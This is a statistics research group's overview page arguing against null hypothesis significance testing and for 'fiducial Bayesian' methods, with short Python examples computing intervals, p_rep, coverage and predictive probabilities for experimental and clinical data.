Equipe Raisonnement Induction Statistique

Statistical research
Criticisms of usual significance tests | The Bayesian therapy | Development of alternative inference methods | The Bayesian Analysis of Comparisons | The likelihood principle: A need to rethink | Study of new distributions | Other application fields | Adaptive designs | Statistical inference and causal analysis | Methodological and didactical implications

The statistical research of ERIS concerns methods for analysing experimental data. The main application fields are experimental psychology and clinical trials in medicine and pharmacology. These fields have two specific features: on the one hand, complex experimental designs are generally used, with precise objectives; on the other hand, experimental results must be accepted by a large community.

## 1. Criticisms of usual significance tests

"The test provides neither the necessary nor the sufficient scope or type of knowledge that basic scientific social research requires." (D.E. Morrison & R.E. Henkel)

Although the use of Null Hypothesis Significance Testing (NHST) has been criticized by the most eminent and the most experienced scientists, on both theoretical and methodological grounds, it is still required in most scientific publications as an unavoidable norm. Our conclusion is that the use of NHST is a socially adapted but methodologically unsuited use of an inadequate tool, promoted through the misleading guidelines of standard textbooks.

### The abuses of interpretation of significance tests

Consider an experiment involving two crossed factors, Age and Treatment, each with two modalities. The means of the four experimental conditions (with 10 subjects in each) are respectively 5.77 (a1,t1), 5.25 (a2,t1), 4.83 (a1,t2) and 4.71 (a2,t2). The following typical comments, based on ANOVA F tests, are found in an experimental journal: "the only significant effect is a main effect of treatment (F[1,36]=6.39, p=0.016), reflecting a substantial improvement"; and again "clearly, there is no evidence (F[1,36]=0.47, p=0.50) of an interaction". The reader is strongly led to believe that both a large main effect of treatment and a small interaction effect have been demonstrated. Do you agree with these conclusions?
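The figures quoted above are enough to go beyond the F tests. As a minimal sketch, assuming a balanced design and the usual single-degree-of-freedom relation F = (effect / standard error)², the standard error of each contrast can be recovered and a 95% interval computed. The helper name `interval_from_f` and the tabulated quantile `T_975_DF36` are introduced here for illustration only.

```python
import math

# Cell means reported in the example (10 subjects per cell).
means = {("a1", "t1"): 5.77, ("a2", "t1"): 5.25,
         ("a1", "t2"): 4.83, ("a2", "t2"): 4.71}

# 0.975 quantile of Student's t with 36 df, taken from standard tables.
T_975_DF36 = 2.028


def interval_from_f(effect, f_ratio, t_quantile=T_975_DF36):
    """Return (standard error, lower, upper) for a 1-df contrast.

    For a single-df contrast F = (effect / se)**2, so se = |effect| / sqrt(F).
    """
    se = abs(effect) / math.sqrt(f_ratio)
    half_width = t_quantile * se
    return se, effect - half_width, effect + half_width


# Main effect of treatment: mean under t1 minus mean under t2.
treatment = ((means["a1", "t1"] + means["a2", "t1"]) / 2
             - (means["a1", "t2"] + means["a2", "t2"]) / 2)

# Interaction: age difference under t1 minus age difference under t2.
interaction = ((means["a1", "t1"] - means["a2", "t1"])
               - (means["a1", "t2"] - means["a2", "t2"]))

for name, effect, f_ratio in [("treatment", treatment, 6.39),
                              ("interaction", interaction, 0.47)]:
    se, low, high = interval_from_f(effect, f_ratio)
    print(f"{name}: effect={effect:.2f}, se={se:.2f}, "
          f"95% interval=[{low:.2f}, {high:.2f}]")
```

Under these assumptions the interval for the treatment effect runs from roughly 0.15 to 1.33, so a small effect is as compatible with the data as a large one, and the interval for the interaction contrast runs from roughly -0.78 to 1.58, which does not establish that the interaction is small. With a standard noninformative prior the same limits can be read as a 95% credible interval.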

### Time for new publication guidelines?

"Habit is habit and not to be flung out of the window by any man, but coaxed downstairs a step at a time." (Mark Twain)

Especially in psychology, changes could result from the work of the Task Force on Statistical Inference, which the American Psychological Association charged with studying the role of NHST in psychological research.

[Wilkinson, L. and Task Force on Statistical Inference, APA Board of Scientific Affairs (1999) - Statistical Methods in Psychology Journals: Guidelines and Explanations. American Psychologist, 54, 594-604.
Azar B. (1999) - APA statistics task force prepares to release recommendations for public comment. APA Monitor Online, 30, 5.]

"The essence of science is replication: a scientist should always be concerned about what would happen if he or another scientist were to repeat his experiment." (Guttman).

In 2006, the Association for Psychological Science introduced a new publication norm in the "author guidelines" of Psychological Science:

Statistics

Effect sizes should accompany major results. In addition, authors are encouraged to use p_rep rather than p values (see the article by Killeen in the May 2005 issue of Psychological Science, Vol. 16, pp. 345-353).

Killeen's p_rep ("probability of replication") now routinely appears in Psychological Science.
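For readers who want to see how such a value is obtained, here is a minimal sketch. It assumes the usual normal-theory form of Killeen's statistic, in which the z value corresponding to a one-tailed p value is divided by the square root of 2 before being converted back to a probability. The function name `p_rep` is chosen here for illustration.

```python
from statistics import NormalDist

STD_NORMAL = NormalDist()


def p_rep(p_one_tailed):
    """Probability of replication from a one-tailed p value.

    Assumes the normal-theory form: Phi(z / sqrt(2)), with z = Phi^{-1}(1 - p).
    """
    z = STD_NORMAL.inv_cdf(1.0 - p_one_tailed)
    return STD_NORMAL.cdf(z / 2 ** 0.5)


for p in (0.05, 0.025, 0.005):
    print(f"one-tailed p = {p}: p_rep = {p_rep(p):.3f}")
```

Under this assumption p_rep is a one-to-one transformation of the p value, and it can be read as a predictive probability that a replication yields an effect of the same sign.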

### New difficulties with confidence intervals

"It would not be scientifically sound to justify a procedure by frequentist arguments and to interpret it in Bayesian terms." (H. Rouanet)

Confidence intervals could quickly become a compulsory norm in experimental publications. However, for many reasons due to their frequentist (Neyman and Pearson) conception, confidence intervals can hardly be viewed as the ultimate method.
Indeed the appealing feature of confidence intervals is the result of a fundamental misunderstanding. As is the case with significance tests, the frequentist interpretation of a 95% confidence interval involves a long run repetition of the same experiment: in the long run 95% of computed confidence intervals will contain the "true value" of the parameter; each interval in isolation has either a 0 or 100% probability of containing it.
It is so strange to treat the data as random even after observation that the orthodox frequentist interpretation of confidence intervals does not make sense for most users.
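The long-run reading described above can be illustrated by simulation. The sketch below assumes a normal model with known standard deviation, so that a simple z-interval applies; the parameter values and the function name `coverage` are hypothetical.

```python
import random
from statistics import NormalDist, fmean


def coverage(true_mean=10.0, sigma=2.0, n=20, repetitions=2000, seed=1):
    """Fraction of 95% z-intervals (known sigma) that contain true_mean."""
    rng = random.Random(seed)
    z = NormalDist().inv_cdf(0.975)
    half_width = z * sigma / n ** 0.5
    hits = 0
    for _ in range(repetitions):
        sample_mean = fmean(rng.gauss(true_mean, sigma) for _ in range(n))
        # Any single interval either contains the true mean or it does not.
        if sample_mean - half_width <= true_mean <= sample_mean + half_width:
            hits += 1
    return hits / repetitions


print(f"long-run coverage: {coverage():.3f}")
```

The 95% figure describes the procedure over many repetitions with a known true mean; it says nothing directly about the one interval computed from the data actually observed.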

### There is interval and interval!

In an introductory statistics textbook, in a series aimed at the general public whose goal is to give the reader the possibility to "access the deep intuitions in the field", one can find the following interpretation of a confidence interval for a proportion: "If in an opinion poll of size 1000, the observed proportion P is equal to 0.613, the proportion π to estimate has a probability 0.95 of lying in the range: [0.58,0.64]". Do you agree with this interpretation?
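The two readings can be compared numerically. As a sketch, the code below computes the usual frequentist (Wald) interval for the poll and then, assuming a Jeffreys Beta(1/2, 1/2) prior (an assumption, not something stated in the textbook), estimates by Monte Carlo the posterior probability that π lies in [0.58, 0.64].

```python
import random
from statistics import NormalDist

n, successes = 1000, 613
p_hat = successes / n

# Frequentist (Wald) 95% interval: a statement about the procedure.
z = NormalDist().inv_cdf(0.975)
half_width = z * (p_hat * (1 - p_hat) / n) ** 0.5
wald = (p_hat - half_width, p_hat + half_width)


def posterior_probability(low, high, draws=20000, seed=1):
    """Monte Carlo estimate of P(low < pi < high | data) under a Jeffreys prior."""
    rng = random.Random(seed)
    # Beta(1/2, 1/2) prior: an assumption made for this illustration.
    a, b = successes + 0.5, n - successes + 0.5
    inside = sum(low < rng.betavariate(a, b) < high for _ in range(draws))
    return inside / draws


print(f"Wald interval: [{wald[0]:.3f}, {wald[1]:.3f}]")
print(f"P(0.58 < pi < 0.64 | data) ~ {posterior_probability(0.58, 0.64):.3f}")
```

The textbook sentence is a probability statement about π given the data, which is a Bayesian statement; it is only justified once a prior such as the one assumed here has been made explicit.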


## 2. The Bayesian therapy

### Won't the Bayesian choice be unavoidable?

"We [statisticians] will all be Bayesians in 2020, and then we can be a united profession." (D.V. Lindley)

We argue that Bayesian methods are ideally suited for creating a change of emphasis in the presentation and interpretation of experimental results. We suggest using "noninformative" Bayesian methods as a therapy for curing the misuses and abuses of NHST.
For many years we have worked with colleagues in France with this perspective in mind in order to develop standard "noninformative" Bayesian methods for the most familiar situations encountered in experimental data analysis.

### The fiducial Bayesian methods

"Maybe Fisher's biggest blunder [fiducial inference] will become a big hit in the 21st century." (B. Efron)

In order to promote these Bayesian methods, it seemed important to us to give them a more explicit name than "standard", "noninformative" or "reference". We propose to call them fiducial Bayesian. This deliberately provocative name pays tribute to Fisher's work on scientific inference for research workers. It indicates their specificity and their aim to express "what the data have to say".
These fiducial Bayesian methods are concrete proposals to bypass the shortcomings of NHST and to improve current statistical methodology and practice.


## 3. Development of alternative statistical inference methods

"A common misconception is that Bayesian analysis is a subjective theory; this is neither true historically nor in practice." (J. Berger)

Our goal is to develop general alternative methods better suited to the needs of users. Bayesian inference is a privileged theoretical framework, at least as objective as traditional frequentist inference.
The fiducial Bayesian methods have been applied many times to real data and have been well accepted by experimental journals.

"Bayesian posterior probabilities are exactly what scientists want." (S.N. Goodman & J.A. Berlin)

### I have the test statistic, can I get an interval?

I have found an article that reports the results of a study designed to test the efficacy of a drug by comparing two groups (treatment vs placebo) of 15 patients each. The article gives the observed difference d=+1.52 in favour of the treatment, and a "Student t test": t=+0.683, 28 degrees of freedom, p=0.50, nonsignificant. I would be interested in an interval estimate (frequentist confidence interval, or fiducial Bayesian credible interval) in order to assess whether the inefficacy of the treatment has really been proved. Is it possible?
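The question can be answered from the two reported numbers alone. As a minimal sketch, assuming the usual two-group Student t test (so that t = d / standard error), the standard error is recovered as d / t and combined with the tabulated 0.975 quantile of the t distribution with 28 degrees of freedom. The constant name `T_975_DF28` is introduced here for illustration.

```python
# 0.975 quantile of Student's t with 28 df, taken from standard tables.
T_975_DF28 = 2.048

d = 1.52       # observed difference reported in the article
t_obs = 0.683  # reported Student t statistic

# t = d / se, so the standard error can be recovered from the two values.
se = d / t_obs
half_width = T_975_DF28 * se
interval = (d - half_width, d + half_width)

print(f"standard error = {se:.3f}")
print(f"95% interval for the true difference: [{interval[0]:.2f}, {interval[1]:.2f}]")
```

The resulting interval, roughly -3.04 to +6.08, is very wide: it is compatible with a sizeable benefit as well as with a harmful effect, so the nonsignificant test cannot be taken as proof of inefficacy. Under a standard noninformative prior the same limits give the 95% credible interval.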

## Software: LesMoyennes

"An essential aspect of the process of evaluating design strategies is the ability to calculate predictive probabilities of potential results." (D.A. Berry)

The ease of making predictions is a particularly attractive feature of Bayesian inference.
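As an illustration of how direct such predictions are, the sketch below computes a predictive probability for binary outcomes with the beta-binomial distribution. The Beta(1/2, 1/2) default prior, the data values and the function names are assumptions made for this example; they are not taken from the software mentioned on this page.

```python
import math


def log_beta(a, b):
    """Logarithm of the Beta function B(a, b)."""
    return math.lgamma(a) + math.lgamma(b) - math.lgamma(a + b)


def predictive_probability(k, m, successes, failures, prior_a=0.5, prior_b=0.5):
    """P(k successes in m future trials | data) under a Beta prior (beta-binomial)."""
    a, b = prior_a + successes, prior_b + failures
    return math.comb(m, k) * math.exp(log_beta(a + k, b + m - k) - log_beta(a, b))


# Hypothetical data: 12 successes and 8 failures observed so far; 10 trials remain.
future = [predictive_probability(k, 10, 12, 8) for k in range(11)]
print(f"P(at least 7 of the next 10 succeed) = {sum(future[7:]):.3f}")
```

The same calculation, applied to the results still to be collected, gives the chance that a planned experiment will reach a given conclusion, which is what makes predictive probabilities useful for design decisions.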

## Software: LesEffectifs


## 4. The Bayesian Analysis of Comparisons

"ANOVA may be the most commonly used statistical procedure. It is assuredly the most commonly misused statistical procedure!" (D.A. Berry)

The Bayesian Analysis of Comparisons provides a flexible methodological framework that bypasses the strict constraints imposed by the traditional "general linear model" and gives priority to the users' questions. Its two main principles are the notion of specific analysis and the use of Bayesian methods.

## Software: PAC (Program for the Analysis of Comparisons)


## 5. The likelihood principle: A need to rethink

The information on the experimental design, including the stopping rule, is one part of the evidence, available prior to the sampling. Consequently this information must be incorporated in the Bayesian prior distribution (R. de Cristofaro, On the foundations of likelihood principle, Journal of Statistical Planning and Inference, 2004, 401–411).
This approach makes it possible to relax the likelihood principle (in its usual form) when appropriate. In particular, a state of ignorance (or indifference) cannot be defined without reference to the design.
Applying these ideas, Bunouf and Lecoutre (2006, 2008) developed Jeffreys-type priors for multistage designs, derived from the likelihood augmented with the design information. They showed that the use of such priors corrects the posterior distributions for the bias induced by the stopping rule.

## Software: LesDistributions


## Software: LesProportions

### Comparison of censored survival curves (especially Weibull model)


New sequential designs that generalize the play-the-winner rule are studied. Theoretical and numerical results show that these designs are preferable to previously proposed designs for the usual criteria.
Bayesian methods are developed for these designs.
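For readers unfamiliar with the starting point, here is a minimal simulation of the classic play-the-winner rule for two treatments: the same treatment is kept after a success and the other one is tried after a failure. This sketch shows only the basic rule, not the generalized designs studied here, and the success probabilities and function name are hypothetical.

```python
import random


def play_the_winner(p_success, n_patients, seed=1):
    """Simulate the classic play-the-winner rule for two treatments.

    p_success maps each treatment label to its (hypothetical) success probability.
    Returns the list of treatments assigned, in order.
    """
    rng = random.Random(seed)
    first, second = list(p_success)
    current = first
    assignments = []
    for _ in range(n_patients):
        assignments.append(current)
        success = rng.random() < p_success[current]
        if not success:
            # A failure switches the next patient to the other treatment.
            current = second if current == first else first
    return assignments


allocation = play_the_winner({"A": 0.8, "B": 0.5}, n_patients=5000)
print(f"share allocated to A: {allocation.count('A') / len(allocation):.3f}")
```

Because a treatment is abandoned only after a failure, the better treatment tends to be given to more patients, which is the property that adaptive designs of this kind aim to exploit.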


## 9. Statistical inference and causal analysis

Reflections on the causal analysis of randomized experiments.

## 10. Methodological and didactical implications

The methodological implications of the developed procedures (do they fit the true needs of users?) are studied from analyses of real experimental data.

"In fact, I find it easier teaching Bayesian statistics than frequentist statistics. There is a single, pivotal notion - Bayes' rule - that describes the process of learning. Bayes' rule is especially easy to teach, and it is easy for students to use." (D.A. Berry)

### Consulting

Psychologists - Pharmaceutical companies.

### Teaching of Bayesian methods for the analysis of experimental data

The conclusion is that teaching the Bayesian approach in the context of experimental data analysis appears both desirable and feasible.

